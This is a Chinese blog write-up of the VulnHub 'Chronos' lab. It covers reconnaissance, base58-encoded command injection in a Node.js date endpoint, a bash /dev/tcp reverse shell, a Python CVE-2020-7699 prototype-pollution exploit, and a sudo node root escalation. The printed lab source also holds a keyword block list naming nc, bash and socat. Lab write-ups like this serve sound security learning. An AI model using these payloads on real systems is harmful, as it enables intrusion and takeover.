<!-- build time:Mon Jul 17 2023 19:57:07 GMT+0800 (中国标准时间) --><!DOCTYPE html><html lang="zh-CN"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1,maximum-scale=2"><meta name="theme-color" content="#FFF"><link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon.png"><link rel="icon" type="image/ico" sizes="32x32" href="/images/favicon.ico"><meta http-equiv="Cache-Control" content="no-transform"><meta http-equiv="Cache-Control" content="no-siteapp"><link rel="alternate" type="application/rss+xml" href="https://blog.xcu.icu/rss.xml"><link rel="alternate" type="application/atom+xml" href="https://blog.xcu.icu/atom.xml"><link rel="alternate" type="application/json" href="https://blog.xcu.icu/feed.json"><link rel="stylesheet" href="//fonts.googleapis.com/css?family=Mulish:300,300italic,400,400italic,700,700italic%7CFredericka%20the%20Great:300,300italic,400,400italic,700,700italic%7CNoto%20Serif%20JP:300,300italic,400,400italic,700,700italic%7CNoto%20Serif%20SC:300,300italic,400,400italic,700,700italic%7CInconsolata:300,300italic,400,400italic,700,700italic&display=swap&subset=latin,latin-ext"><link rel="stylesheet" href="/css/app.css?v=0.2.5"><meta name="keywords" content="Vulnhub"><link rel="canonical" href="https://blog.xcu.icu/2023/07/15/Chronos%E7%9A%84%E9%9D%B6%E6%9C%BA%E6%89%93%E9%9D%B6%E8%AE%B0%E5%BD%95/"><title>Chronos的靶机打靶记录 - Vulnhub | ClownのBlog =</title><meta name="generator" content="Hexo 6.3.0"></head><body itemscope itemtype="http://schema.org/WebPage"><div id="loading"><div class="cat"><div class="body"></div><div class="head"><div class="face"></div></div><div class="foot"><div class="tummy-end"></div><div class="bottom"></div><div class="legs left"></div><div class="legs right"></div></div><div class="paw"><div class="hands left"></div><div class="hands right"></div></div></div></div><div id="container"><header id="header" itemscope itemtype="http://schema.org/WPHeader"><div class="inner"><div id="brand"><div class="pjax"><h1 itemprop="name headline">Chronos的靶机打靶记录</h1><div class="meta"><span class="item" title="创建时间：2023-07-15 00:00:00"><span class="icon"><i class="ic i-calendar"></i> </span><span class="text">发表于</span> <time itemprop="dateCreated datePublished" datetime="2023-07-15T00:00:00+08:00">2023-07-15</time> </span><span class="item" title="本文字数"><span class="icon"><i class="ic i-pen"></i> </span><span class="text">本文字数</span> <span>6.2k</span> <span class="text">字</span> </span><span class="item" title="阅读时长"><span class="icon"><i class="ic i-clock"></i> </span><span class="text">阅读时长</span> <span>6 分钟</span></span></div></div></div><nav id="nav"><div class="inner"><div class="toggle"><div class="lines" aria-label="切换导航栏"><span class="line"></span> <span class="line"></span> <span class="line"></span></div></div><ul class="menu"><li class="item title"><a href="/" rel="start">ClownのBlog</a></li></ul><ul class="right"><li class="item theme"><i class="ic i-sun"></i></li><li class="item search"><i class="ic i-search"></i></li></ul></div></nav></div><div id="imgs" class="pjax"><ul><li class="item" data-background-image="https://note-1311335427.cos.ap-shanghai.myqcloud.com/images/9.jpg"></li><li class="item" data-background-image="https://note-1311335427.cos.ap-shanghai.myqcloud.com/images/64.jpg"></li><li class="item" data-background-image="https://note-1311335427.cos.ap-shanghai.myqcloud.com/images/126.jpg"></li><li class="item" data-background-image="https://note-1311335427.cos.ap-shanghai.myqcloud.com/images/82.jpg"></li><li class="item" data-background-image="https://note-1311335427.cos.ap-shanghai.myqcloud.com/images/28.jpg"></li><li class="item" data-background-image="https://note-1311335427.cos.ap-shanghai.myqcloud.com/images/98.jpg"></li></ul></div></header><div id="waves"><svg class="waves" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" viewBox="0 24 150 28" preserveAspectRatio="none" shape-rendering="auto"><defs><path id="gentle-wave" d="M-160 44c30 0 58-18 88-18s 58 18 88 18 58-18 88-18 58 18 88 18 v44h-352z"/></defs><g class="parallax"><use xlink:href="#gentle-wave" x="48" y="0"/><use xlink:href="#gentle-wave" x="48" y="3"/><use xlink:href="#gentle-wave" x="48" y="5"/><use xlink:href="#gentle-wave" x="48" y="7"/></g></svg></div><main><div class="inner"><div id="main" class="pjax"><div class="article wrap"><div class="breadcrumb" itemscope itemtype="https://schema.org/BreadcrumbList"><i class="ic i-home"></i> <span><a href="/">首页</a></span><i class="ic i-angle-right"></i> <span class="current" itemprop="itemListElement" itemscope itemtype="https://schema.org/ListItem"><a href="/categories/Vulnhub/" itemprop="item" rel="index" title="分类于 Vulnhub"><span itemprop="name">Vulnhub</span></a><meta itemprop="position" content="1"></span></div><article itemscope itemtype="http://schema.org/Article" class="post block" lang="zh-CN"><link itemprop="mainEntityOfPage" href="https://blog.xcu.icu/2023/07/15/Chronos%E7%9A%84%E9%9D%B6%E6%9C%BA%E6%89%93%E9%9D%B6%E8%AE%B0%E5%BD%95/"><span hidden itemprop="author" itemscope itemtype="http://schema.org/Person"><meta itemprop="image" content="/images/avatar.jpg"><meta itemprop="name" content="Clown"><meta itemprop="description" content=", 一个妄想全栈web小废物"></span><span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization"><meta itemprop="name" content=""></span><div class="body md" itemprop="articleBody"><h2 id="前言"><a href="#前言" class="headerlink" title="前言"></a>前言</h2><p>这不刚写完nodejs的相关利用，这里也是马上找到了一个js的靶机来学习一下，本次的的目标<span class="exturl" data-url="aHR0cHM6Ly93d3cudnVsbmh1Yi5jb20vZW50cnkvY2hyb25vcy0xLDczNS8=">Chronos: 1 ~ VulnHub</span>，本来想水一下描述，但是发现作者就给了一个中等难度，那我就自己做下来的过程给一个描述。</p><h2 id="描述"><a href="#描述" class="headerlink" title="描述"></a>描述</h2><p>难度：中级</p><p>设计的任务：</p><ul><li>主机发现，端口扫描</li><li>WEB应用攻击</li><li>命令注入</li><li>数据编解码</li><li>框架漏洞利用</li><li>代码审计</li><li>本地提权</li></ul><p>虚拟机：</p><ul><li>格式： 虚拟机 （Virtualbox OVA）</li><li>操作系统： Linux.</li></ul><p>联网：</p><ul><li>DHCP 服务：已启用</li><li>IP 地址自动分配</li></ul><h2 id="攻击过程"><a href="#攻击过程" class="headerlink" title="攻击过程"></a>攻击过程</h2><h3 id="信息收集"><a href="#信息收集" class="headerlink" title="信息收集"></a>信息收集</h3><p>这里靶机和我的kali都是通过桥接连接到局域网中</p><p><img data-src="https://note-1311335427.cos.ap-shanghai.myqcloud.com/images/image-20230715073929840.png" alt="image-20230715073929840"></p><p>这里我kali的ip是192.168.13.249,这里用nmap扫描13全段</p><p><img data-src="https://note-1311335427.cos.ap-shanghai.myqcloud.com/images/image-20230715074108860.png" alt="image-20230715074108860"></p><p>这里给其分配的ip是192.168.13.96,接着对端口进行一个协议的发现</p><p><img data-src="https://note-1311335427.cos.ap-shanghai.myqcloud.com/images/image-20230715074315887.png" alt="image-20230715074315887"></p><p>这里可以看到22端口是一个openssh服务，版本是7.6，80是一个Apache的web服务版本是2.4.29，8000端口是一个nodejs的web服务</p><p>这里还是去通过浏览器访问80端口和8000端口</p><p><img data-src="https://note-1311335427.cos.ap-shanghai.myqcloud.com/images/image-20230715075134888.png" alt="image-20230715075134888"></p><p><img data-src="https://note-1311335427.cos.ap-shanghai.myqcloud.com/images/image-20230715075157760.png" alt="image-20230715075157760"></p><p>这里两个端口都发现了类似的js源码</p><p><img data-src="https://note-1311335427.cos.ap-shanghai.myqcloud.com/images/image-20230715075334703.png" alt="image-20230715075334703"></p><p><img data-src="https://note-1311335427.cos.ap-shanghai.myqcloud.com/images/image-20230715075346630.png" alt="image-20230715075346630"></p><p>这里将这部分js代码复制到文本中分析，这里文本信息很杂乱，而且有编码，这里使用在线工具对其进行整理</p><p><img data-src="https://note-1311335427.cos.ap-shanghai.myqcloud.com/images/image-20230715080007487.png" alt="image-20230715080007487"></p><pre><code class="JavaScript">var _0x5bdf = [
    &#39;150447srWefj&#39;,
    &#39;70lwLrol&#39;,
    &#39;1658165LmcNig&#39;,
    &#39;open&#39;,
    &#39;1260881JUqdKM&#39;,
    &#39;10737CrnEEe&#39;,
    &#39;2SjTdWC&#39;,
    &#39;readyState&#39;,
    &#39;responseText&#39;,
    &#39;1278676qXleJg&#39;,
    &#39;797116soVTES&#39;,
    &#39;onreadystatechange&#39;,
    &#39;http://chronos.local:8000/date?format=4ugYDuAkScCG5gMcZjEN3mALyG1dD5ZYsiCfWvQ2w9anYGyL&#39;,
    &#39;User-Agent&#39;,
    &#39;status&#39;,
    &#39;1DYOODT&#39;,
    &#39;400909Mbbcfr&#39;,
    &#39;Chronos&#39;,
    &#39;2QRBPWS&#39;,
    &#39;getElementById&#39;,
    &#39;innerHTML&#39;,
    &#39;date&#39;
];
(function (_0x506b95, _0x817e36) &#123;
    var _0x244260 = _0x432d;
    while (!![]) &#123;
        try &#123;
            var _0x35824b = -parseInt(_0x244260(126)) * parseInt(_0x244260(144)) + parseInt(_0x244260(142)) + parseInt(_0x244260(127)) * parseInt(_0x244260(131)) + -parseInt(_0x244260(135)) + -parseInt(_0x244260(130)) * parseInt(_0x244260(141)) + -parseInt(_0x244260(136)) + parseInt(_0x244260(128)) * parseInt(_0x244260(132));
            if (_0x35824b === _0x817e36)
                break;
            else
                _0x506b95[&#39;push&#39;](_0x506b95[&#39;shift&#39;]());
        &#125; catch (_0x3fb1dc) &#123;
            _0x506b95[&#39;push&#39;](_0x506b95[&#39;shift&#39;]());
        &#125;
    &#125;
&#125;(_0x5bdf, 831262));
function _0x432d(_0x16bd66, _0x33ffa9) &#123;
    return _0x432d = function (_0x5bdf82, _0x432dc8) &#123;
        _0x5bdf82 = _0x5bdf82 - 126;
        var _0x4da6e8 = _0x5bdf[_0x5bdf82];
        return _0x4da6e8;
    &#125;, _0x432d(_0x16bd66, _0x33ffa9);
&#125;
function loadDoc() &#123;
    var _0x17df92 = _0x432d, _0x1cff55 = _0x17df92(143), _0x2beb35 = new XMLHttpRequest();
    _0x2beb35[_0x17df92(137)] = function () &#123;
        var _0x146f5d = _0x17df92;
        this[_0x146f5d(133)] == 4 &amp;&amp; this[_0x146f5d(140)] == 200 &amp;&amp; (document[_0x146f5d(145)](_0x146f5d(147))[_0x146f5d(146)] = this[_0x146f5d(134)]);
    &#125;, _0x2beb35[_0x17df92(129)](&#39;GET&#39;, _0x17df92(138), !![]), _0x2beb35[&#39;setRequestHeader&#39;](_0x17df92(139), _0x1cff55), _0x2beb35[&#39;send&#39;]();
&#125;
</code></pre><p>这里有个url，先对参数进行解码，发现是base58加密</p><p><img data-src="https://note-1311335427.cos.ap-shanghai.myqcloud.com/images/image-20230715082739759.png" alt="image-20230715082739759"></p><p>现在不知道有什么用，这里去访问一下</p><p><img data-src="https://note-1311335427.cos.ap-shanghai.myqcloud.com/images/image-20230715080204315.png" alt="image-20230715080204315"></p><p>这里直接去访问是没有权限的，这里我开始以为是伪造身份信息之类，最后我又访问了一次不带参数的8000端口发现了奇怪的地方</p><p><img data-src="https://note-1311335427.cos.ap-shanghai.myqcloud.com/images/image-20230715081112507.png" alt="image-20230715081112507"></p><p>这里直接发送了http:&#x2F;&#x2F;chronos.local:8000&#x2F;date?format&#x3D;4ugYDuAkScCG5gMcZjEN3mALyG1dD5ZYsiCfWvQ2w9anYGyL这个请求，但是他的页面又是基于ip的，这个域名没法解析，于是这里我更改了本地的host文件</p><p><img data-src="https://note-1311335427.cos.ap-shanghai.myqcloud.com/images/image-20230715081512401.png" alt="image-20230715081512401"></p><p>更改完成的效果</p><p><img data-src="https://note-1311335427.cos.ap-shanghai.myqcloud.com/images/image-20230715081553334.png" alt="image-20230715081553334"></p><p>这是我再去访问页面</p><p><img data-src="https://note-1311335427.cos.ap-shanghai.myqcloud.com/images/image-20230715081819105.png" alt="image-20230715081819105"></p><p>这里再去尝试访问http:&#x2F;&#x2F;chronos.local:8000&#x2F;date?format&#x3D;4ugYDuAkScCG5gMcZjEN3mALyG1dD5ZYsiCfWvQ2w9anYGyL这个请求就是能成功的</p><p><img data-src="https://note-1311335427.cos.ap-shanghai.myqcloud.com/images/image-20230715081712016.png" alt="image-20230715081712016"></p><p><img data-src="https://note-1311335427.cos.ap-shanghai.myqcloud.com/images/image-20230715081722800.png" alt="image-20230715081722800"></p><p>两个页面都多来一条当前的时间</p><p><img data-src="https://note-1311335427.cos.ap-shanghai.myqcloud.com/images/image-20230715082339580.png" alt="image-20230715082339580"></p><p>这里可以看见，这个时间实际上是get的这个请求得到的，这里使用burp抓包方便测试，这个输出的结果格式和上面解码拿到的相同，这里更改了一下传入的信息</p><p><img data-src="https://note-1311335427.cos.ap-shanghai.myqcloud.com/images/image-20230715083121633.png" alt="image-20230715083121633"></p><p>这里通过burp重放</p><p><img data-src="https://note-1311335427.cos.ap-shanghai.myqcloud.com/images/image-20230715083148006.png" alt="image-20230715083148006"></p><p>可以看到这里是能根据我的参数进行改变的</p><h3 id="命令注入反弹shell"><a href="#命令注入反弹shell" class="headerlink" title="命令注入反弹shell"></a>命令注入反弹shell</h3><p>很显然这里应该是一个date命令，这里应该是可以进行命令注入</p><p><img data-src="https://note-1311335427.cos.ap-shanghai.myqcloud.com/images/image-20230715085117363.png" alt="image-20230715085117363"></p><p>这里这样尝试一下</p><p><img data-src="https://note-1311335427.cos.ap-shanghai.myqcloud.com/images/image-20230715085140947.png" alt="image-20230715085140947"></p><p>发现是能够成功执行命令的，这里反弹一个shell</p><pre><code class="perl">bash -c &quot;bash -i &gt;&amp; /dev/tcp/192.168.13.249/2333 0&gt;&amp;1&quot;
</code></pre><p><img data-src="https://note-1311335427.cos.ap-shanghai.myqcloud.com/images/image-20230715085421912.png" alt="image-20230715085421912"></p><p>这里就可以成功拿到一个shell</p><p><img data-src="https://note-1311335427.cos.ap-shanghai.myqcloud.com/images/image-20230715085501970.png" alt="image-20230715085501970"></p><h3 id="进一步信息收集"><a href="#进一步信息收集" class="headerlink" title="进一步信息收集"></a>进一步信息收集</h3><p>接下来就是去这台机器上面寻找相关信息，首先我到根目录就看到一个lost+found文件，这里应该是一个删除的文件，这里想要打开却权限不够</p><p><img data-src="https://note-1311335427.cos.ap-shanghai.myqcloud.com/images/image-20230715090922436.png" alt="image-20230715090922436"></p><p>所以这里我又去查看了一下&#x2F;etc&#x2F;passwd文件</p><p><img data-src="https://note-1311335427.cos.ap-shanghai.myqcloud.com/images/image-20230715091218132.png" alt="image-20230715091218132"></p><p>这里看见有两个可以执行shell的用户，这里去home目录看一下发现有一个imera目录，但是没权限打开其中的文件</p><p><img data-src="https://note-1311335427.cos.ap-shanghai.myqcloud.com/images/image-20230715091623349.png" alt="image-20230715091623349"></p><p>这里就需要提权，当时内核，sudo，suid都没有找到能提权的方式，这里最后是在网站根目录找到了能进一步利用的地方，这里可以先看到package,json文件</p><p><img data-src="https://note-1311335427.cos.ap-shanghai.myqcloud.com/images/image-20230715093606041.png" alt="image-20230715093606041"></p><p>这里声明了环境用到的框架和库，这里可以看到使用了express框架，这里看一下app.js</p><pre><code class="javascript">const express = require(&#39;express&#39;);
const &#123; exec &#125; = require(&quot;child_process&quot;);
const bs58 = require(&#39;bs58&#39;);
const app = express();
const port = 8000;
const cors = require(&#39;cors&#39;);
app.use(cors());
app.get(&#39;/&#39;, (req,res) =&gt;&#123;
    res.sendFile(&quot;/var/www/html/index.html&quot;);
&#125;);
app.get(&#39;/date&#39;, (req, res) =&gt; &#123;
    var agent = req.headers[&#39;user-agent&#39;];
    var cmd = &#39;date &#39;;
    const format = req.query.format;
    const bytes = bs58.decode(format);
    var decoded = bytes.toString();
    var concat = cmd.concat(decoded);
    if (agent === &#39;Chronos&#39;) &#123;
        if (concat.includes(&#39;id&#39;) || concat.includes(&#39;whoami&#39;) || concat.includes(&#39;python&#39;) || concat.includes(&#39;nc&#39;) || concat.includes(&#39;bash&#39;) || concat.includes(&#39;php&#39;) || concat.includes(&#39;which&#39;) || concat.includes(&#39;socat&#39;)) &#123;
            res.send(&quot;Something went wrong&quot;);
        &#125;
        exec(concat, (error, stdout, stderr) =&gt; &#123;
            if (error) &#123;
                console.log(`error: $&#123;error.message&#125;`);
                return;
            &#125;
            if (stderr) &#123;
                console.log(`stderr: $&#123;stderr&#125;`);
                return;
            &#125;
            res.send(stdout);
        &#125;);
    &#125;
    else&#123;
        res.send(&quot;Permission Denied&quot;);
    &#125;
&#125;)
app.listen(port,() =&gt; &#123;
    console.log(`Server running at $&#123;port&#125;`);
&#125;)
</code></pre><p>这个就是刚刚访问的那个服务的代码，回到上级目录，这里发现了另一个目录</p><p><img data-src="https://note-1311335427.cos.ap-shanghai.myqcloud.com/images/image-20230715102046937.png" alt="image-20230715102046937"></p><p>这里看到chronos-v2是隶属root的，这里就猜测这里可能是有另一个web应用这里，这里也是进去看一下</p><p><img data-src="https://note-1311335427.cos.ap-shanghai.myqcloud.com/images/image-20230715102811833.png" alt="image-20230715102811833"></p><p>这里又发现一个package.json文件，这里打开看一下这个文件</p><p><img data-src="https://note-1311335427.cos.ap-shanghai.myqcloud.com/images/image-20230715102923282.png" alt="image-20230715102923282"></p><p>这里有一个express-fileupload，这里存在原型链污染，这里先提一下，详细的后面说，接着打开server.js文件</p><pre><code class="javascript">const express = require(&#39;express&#39;);
const fileupload = require(&quot;express-fileupload&quot;);
const http = require(&#39;http&#39;)

const app = express();

app.use(fileupload(&#123; parseNested: true &#125;));

app.set(&#39;view engine&#39;, &#39;ejs&#39;);
app.set(&#39;views&#39;, &quot;/opt/chronos-v2/frontend/pages&quot;);

app.get(&#39;/&#39;, (req, res) =&gt; &#123;
   res.render(&#39;index&#39;)
&#125;);

const server = http.Server(app);
const addr = &quot;127.0.0.1&quot;
const port = 8080;
server.listen(port, addr, () =&gt; &#123;
   console.log(&#39;Server listening on &#39; + addr + &#39; port &#39; + port);
&#125;);
</code></pre><p>这里可以看到，这个8080只开放给127.0.0.1，这里可以看到parseNested配置选项设置为true，前面的版本是1.1.7，条件都满足了NodeJS模块代码注入</p><h3 id="漏洞利用"><a href="#漏洞利用" class="headerlink" title="漏洞利用"></a>漏洞利用</h3><p>漏洞编号CVE-2020-7699</p><pre><code class="python">import requests

url = &#39;http://127.0.0.1:8080&#39;
cmd = &#39;bash -c &quot;bash -i &gt;&amp; /dev/tcp/192.168.13.249/2444 0&gt;&amp;1&quot;&#39;
poc = &#123;
    &#39;__proto__.outputFunctionName&#39;: (None,f&quot;x;process.mainModule.require(&#39;child_process&#39;).exec(&#39;&#123;cmd&#125;&#39;);x&quot;
    )
&#125;

requests.post(url, files=poc)
requests.get(url)
</code></pre><p>这里在kali开启http服务将文件传输进靶机中</p><p><img data-src="https://note-1311335427.cos.ap-shanghai.myqcloud.com/images/image-20230715115021639.png" alt="image-20230715115021639"></p><p><img data-src="https://note-1311335427.cos.ap-shanghai.myqcloud.com/images/image-20230715115034887.png" alt="image-20230715115034887"></p><p>这里监听2444端口后运行脚本</p><p><img data-src="https://note-1311335427.cos.ap-shanghai.myqcloud.com/images/image-20230715115653458.png" alt="image-20230715115653458"></p><p>成功拿到shell，这里可以看到当前的用户是imera，是不是就想起了开始为什么要提权？当即去到imera目录查看那个user.txt文件</p><p><img data-src="https://note-1311335427.cos.ap-shanghai.myqcloud.com/images/image-20230715115924920.png" alt="image-20230715115924920"></p><p>这里拿到的好像又是一个编码</p><p><img data-src="https://note-1311335427.cos.ap-shanghai.myqcloud.com/images/image-20230715120043402.png" alt="image-20230715120043402"></p><p>这里算是拿到了第一个flag，但是这并没结束，我们并没有拿到root权限</p><h3 id="二次提权"><a href="#二次提权" class="headerlink" title="二次提权"></a>二次提权</h3><p>还是刚刚提到的三种提权方式，内核，suid，sudo三种方式，分别查看后，发现这里sudo有配置漏洞</p><p><img data-src="https://note-1311335427.cos.ap-shanghai.myqcloud.com/images/image-20230715120515989.png" alt="image-20230715120515989"></p><p>这里使用node来进行提权</p><pre><code class="perl">sudo node -e &#39;child_process.spawn(&quot;/bin/bash&quot;,&#123;stdio:[0,1,2]&#125;)&#39;
</code></pre><p><img data-src="https://note-1311335427.cos.ap-shanghai.myqcloud.com/images/image-20230715120756692.png" alt="image-20230715120756692"></p><p>这里提权成功，这里还是到家目录，这里还有一个flag，也能拿到root的权限</p><p><img data-src="https://note-1311335427.cos.ap-shanghai.myqcloud.com/images/image-20230715120835250.png" alt="image-20230715120835250"></p><p>到这里就算是结束了，总的来说收货很多，但是对于nodejs的利用好像不是特别明显哈，也是去<span class="exturl" data-url="aHR0cHM6Ly9zdXl1bWVuLmdpdGh1Yi5pby8yMDIyLzA0LzE2LzIwMjItMDQtMTYtQ1ZFLTIwMjAtNzY5OS8=">CVE-2020-7699复现 · SUYUMEN</span>这位师傅的博客去学习了一下</p><div class="tags"><a href="/tags/Vulnhub/" rel="tag"><i class="ic i-tag"></i> Vulnhub</a></div></div><footer><div class="meta"><span id="2023/07/15/Chronos的靶机打靶记录/" class="item leancloud_visitors" data-flag-title="Chronos的靶机打靶记录" title="阅读次数"><span class="icon"><i class="ic i-eye"></i> </span><span class="text">阅读次数</span> <span class="leancloud-visitors-count"></span> <span class="text">次</span></span></div><div id="copyright"><ul><li class="author"><strong>本文作者： </strong>Clown <i class="ic i-at"><em>@</em></i></li><li class="link"><strong>本文链接：</strong> <a href="https://blog.xcu.icu/2023/07/15/Chronos%E7%9A%84%E9%9D%B6%E6%9C%BA%E6%89%93%E9%9D%B6%E8%AE%B0%E5%BD%95/" title="Chronos的靶机打靶记录">https://blog.xcu.icu/2023/07/15/Chronos的靶机打靶记录/</a></li><li class="license"><strong>版权声明： </strong>本站所有文章除特别声明外，均采用 <span class="exturl" data-url="aHR0cHM6Ly9jcmVhdGl2ZWNvbW1vbnMub3JnL2xpY2Vuc2VzL2J5LW5jLXNhLzQuMC9kZWVkLnpo"><i class="ic i-creative-commons"><em>(CC)</em></i>BY-NC-SA</span> 许可协议。转载请注明出处！</li></ul></div></footer></article></div><div class="post-nav"><div class="item left"><a href="/2023/07/14/easy_cloudantivirus%E9%9D%B6%E6%9C%BA%E6%94%BB%E5%87%BB%E8%AE%B0%E5%BD%95/" itemprop="url" rel="prev" data-background-image="https:&#x2F;&#x2F;note-1311335427.cos.ap-shanghai.myqcloud.com&#x2F;images&#x2F;3.jpg" title="记一次easy_cloudantivirus打靶记录"><span class="type">上一篇</span> <span class="category"><i class="ic i-flag"></i> Vulnhub</span><h3>记一次easy_cloudantivirus打靶记录</h3></a></div><div class="item right"><a href="/2023/07/16/hard_socnet2%E9%9D%B6%E6%9C%BA%E6%89%93%E9%9D%B6%E8%AE%B0%E5%BD%95/" itemprop="url" rel="next" data-background-image="https:&#x2F;&#x2F;note-1311335427.cos.ap-shanghai.myqcloud.com&#x2F;images&#x2F;75.jpg" title="hard_socnet2的靶机打靶记录"><span class="type">下一篇</span> <span class="category"><i class="ic i-flag"></i> Vulnhub</span><h3>hard_socnet2的靶机打靶记录</h3></a></div></div><div class="wrap" id="comments"></div></div><div id="sidebar"><div class="inner"><div class="panels"><div class="inner"><div class="contents panel pjax" data-title="文章目录"><ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%89%8D%E8%A8%80"><span class="toc-number">1.</span> <span class="toc-text">前言</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%8F%8F%E8%BF%B0"><span class="toc-number">2.</span> <span class="toc-text">描述</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%94%BB%E5%87%BB%E8%BF%87%E7%A8%8B"><span class="toc-number">3.</span> <span class="toc-text">攻击过程</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E4%BF%A1%E6%81%AF%E6%94%B6%E9%9B%86"><span class="toc-number">3.1.</span> <span class="toc-text">信息收集</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%91%BD%E4%BB%A4%E6%B3%A8%E5%85%A5%E5%8F%8D%E5%BC%B9shell"><span class="toc-number">3.2.</span> <span class="toc-text">命令注入反弹shell</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E8%BF%9B%E4%B8%80%E6%AD%A5%E4%BF%A1%E6%81%AF%E6%94%B6%E9%9B%86"><span class="toc-number">3.3.</span> <span class="toc-text">进一步信息收集</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8"><span class="toc-number">3.4.</span> <span class="toc-text">漏洞利用</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E4%BA%8C%E6%AC%A1%E6%8F%90%E6%9D%83"><span class="toc-number">3.5.</span> <span class="toc-text">二次提权</span></a></li></ol></li></ol></div><div class="related panel pjax" data-title="系列文章"><ul><li><a href="/2022/11/04/Billu_b0x%E6%89%93%E9%9D%B6%E8%AE%B0%E5%BD%95/" rel="bookmark" title="Billu_b0x打靶记录">Billu_b0x打靶记录</a></li><li><a href="/2023/07/11/%E8%AE%B0%E4%B8%80%E6%AC%A1%E5%8F%A4%E8%80%81%E7%9A%84%E9%9D%B6%E6%9C%BAmedium_socnet%E7%9A%84%E6%89%93%E9%9D%B6%E8%AE%B0%E5%BD%95/" rel="bookmark" title="记一次古老的靶机medium_socnet的打靶记录">记一次古老的靶机medium_socnet的打靶记录</a></li><li><a href="/2023/07/14/easy_cloudantivirus%E9%9D%B6%E6%9C%BA%E6%94%BB%E5%87%BB%E8%AE%B0%E5%BD%95/" rel="bookmark" title="记一次easy_cloudantivirus打靶记录">记一次easy_cloudantivirus打靶记录</a></li><li class="active"><a href="/2023/07/15/Chronos%E7%9A%84%E9%9D%B6%E6%9C%BA%E6%89%93%E9%9D%B6%E8%AE%B0%E5%BD%95/" rel="bookmark" title="Chronos的靶机打靶记录">Chronos的靶机打靶记录</a></li><li><a href="/2023/07/16/hard_socnet2%E9%9D%B6%E6%9C%BA%E6%89%93%E9%9D%B6%E8%AE%B0%E5%BD%95/" rel="bookmark" title="hard_socnet2的靶机打靶记录">hard_socnet2的靶机打靶记录</a></li></ul></div><div class="overview panel" data-title="站点概览"><div class="author" itemprop="author" itemscope itemtype="http://schema.org/Person"><img class="image" itemprop="image" alt="Clown" data-src="/images/avatar.jpg"><p class="name" itemprop="name">Clown</p><div class="description" itemprop="description">一个妄想全栈web小废物</div></div><nav class="state"><div class="item posts"><a href="/archives/"><span class="count">57</span> <span class="name">文章</span></a></div><div class="item categories"><a href="/categories/"><span class="count">12</span> <span class="name">分类</span></a></div><div class="item tags"><a href="/tags/"><span class="count">40</span> <span class="name">标签</span></a></div></nav><div class="social"><span class="exturl item github" data-url="aHR0cHM6Ly9naXRodWIuY29tL2Nsb3duLXE=" title="https:&#x2F;&#x2F;github.com&#x2F;clown-q"><i class="ic i-github"></i></span> <span class="exturl item email" data-url="bWFpbHRvOjI2NDIxMzczNjVAcXEuY29t" title="mailto:2642137365@qq.com"><i class="ic i-envelope"></i></span></div><ul class="menu"><li class="item"><a href="/" rel="section"><i class="ic i-home"></i>首页</a></li><li class="item"><a href="/about/" rel="section"><i class="ic i-user"></i>关于</a></li><li class="item dropdown"><a href="javascript:void(0);"><i class="ic i-feather"></i>文章</a><ul class="submenu"><li class="item"><a href="/archives/" rel="section"><i class="ic i-list-alt"></i>归档</a></li><li class="item"><a href="/categories/" rel="section"><i class="ic i-th"></i>分类</a></li><li class="item"><a href="/tags/" rel="section"><i class="ic i-tags"></i>标签</a></li></ul></li><li class="item"><a href="/friends/" rel="section"><i class="ic i-heart"></i>friends</a></li><li class="item"><a href="/links/" rel="section"><i class="ic i-magic"></i>links</a></li></ul></div></div></div><ul id="quick"><li class="prev pjax"><a href="/2023/07/14/easy_cloudantivirus%E9%9D%B6%E6%9C%BA%E6%94%BB%E5%87%BB%E8%AE%B0%E5%BD%95/" rel="prev" title="上一篇"><i class="ic i-chevron-left"></i></a></li><li class="up"><i class="ic i-arrow-up"></i></li><li class="down"><i class="ic i-arrow-down"></i></li><li class="next pjax"><a href="/2023/07/16/hard_socnet2%E9%9D%B6%E6%9C%BA%E6%89%93%E9%9D%B6%E8%AE%B0%E5%BD%95/" rel="next" title="下一篇"><i class="ic i-chevron-right"></i></a></li><li class="percent"></li></ul></div></div><div class="dimmer"></div></div></main><footer id="footer"><div class="inner"><div class="widgets"><div class="rpost pjax"><h2>随机文章</h2><ul><li class="item"><div class="breadcrumb"><a href="/categories/Vulnhub/" title="分类于 Vulnhub">Vulnhub</a></div><span><a href="/2023/07/16/hard_socnet2%E9%9D%B6%E6%9C%BA%E6%89%93%E9%9D%B6%E8%AE%B0%E5%BD%95/" title="hard_socnet2的靶机打靶记录">hard_socnet2的靶机打靶记录</a></span></li><li class="item"><div class="breadcrumb"><a href="/categories/Web/" title="分类于 Web">Web</a></div><span><a href="/2022/10/24/awd-web%E5%B0%8F%E7%BB%93/" title="Awd-web小结">Awd-web小结</a></span></li><li class="item"><div class="breadcrumb"><a href="/categories/Web/" title="分类于 Web">Web</a></div><span><a href="/2023/03/20/%E8%A2%AB%E5%8A%A8%E4%BF%A1%E6%81%AF%E6%94%B6%E9%9B%86/" title="被动信息收集">被动信息收集</a></span></li><li class="item"><div class="breadcrumb"><a href="/categories/java%E5%AE%89%E5%85%A8/" title="分类于 java安全">java安全</a></div><span><a href="/2023/03/26/java%E5%8F%8D%E5%B0%84/" title="java反射">java反射</a></span></li><li class="item"><div class="breadcrumb"><a href="/categories/Web/" title="分类于 Web">Web</a></div><span><a href="/2022/10/24/sql%E6%B3%A8%E5%85%A5/" title="SQL注入">SQL注入</a></span></li><li class="item"><div class="breadcrumb"><a href="/categories/Vulnhub/" title="分类于 Vulnhub">Vulnhub</a></div><span><a href="/2022/11/04/Billu_b0x%E6%89%93%E9%9D%B6%E8%AE%B0%E5%BD%95/" title="Billu_b0x打靶记录">Billu_b0x打靶记录</a></span></li><li class="item"><div class="breadcrumb"><a href="/categories/%E5%86%85%E7%BD%91/" title="分类于 内网">内网</a></div><span><a 